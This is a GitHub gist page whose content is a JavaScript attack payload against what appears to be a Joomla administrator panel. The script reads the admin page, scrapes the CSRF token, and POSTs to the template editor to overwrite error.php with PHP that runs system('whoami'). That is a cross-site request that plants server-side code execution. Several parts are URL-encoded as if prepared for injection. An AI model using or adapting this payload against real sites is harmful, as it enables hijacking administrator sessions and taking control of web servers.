Skip to content

Instantly share code, notes, and snippets.

@komang4130
Last active December 25, 2019 07:28
Show Gist options
  • Save komang4130/0ed6f8cffd3e57d20cfd6052f6db2e8c to your computer and use it in GitHub Desktop.
Save komang4130/0ed6f8cffd3e57d20cfd6052f6db2e8c to your computer and use it in GitHub Desktop.
<script>
var xhttp = new XMLHttpRequest();
var url='http://localhost:8072/new/administrator/index.php';
var csrf = "";
xhttp.onreadystatechange = function() {
if (this.readyState == 4 && this.status == 200) {
_csrf = xhttp.response.split("csrf.token")[1].split("system.paths")[0].substring(3,35);
csrf = _csrf;
console.log(csrf)
var req = new XMLHttpRequest();
var url = "http%3A%2F%2Flocalhost%3A8072%2Fnew%2Fadministrator%2Findex.php%3Foption%3Dcom_templates%26view%3Dtemplate%26id%3D506%26file%3DL2Vycm9yLnBocA";
var data = "jform%5Bsource%5D=%3C%3Fphp+system%28%27whoami%27%29%3B&task=template.apply&" %2B csrf %2B "=1&jform%5Bextension_id%5D=506&jform%5Bfilename%5D=%2Ferror.php";
console.log(data)
req.onreadystatechange = function() {
if (this.readyState == 4 && this.status == 200) {
console.log("done writing payload");
}
};
req.open("POST",url);
req.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
req.send(data);
}
};
xhttp.open("GET", url);
xhttp.send();
</script%3E
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment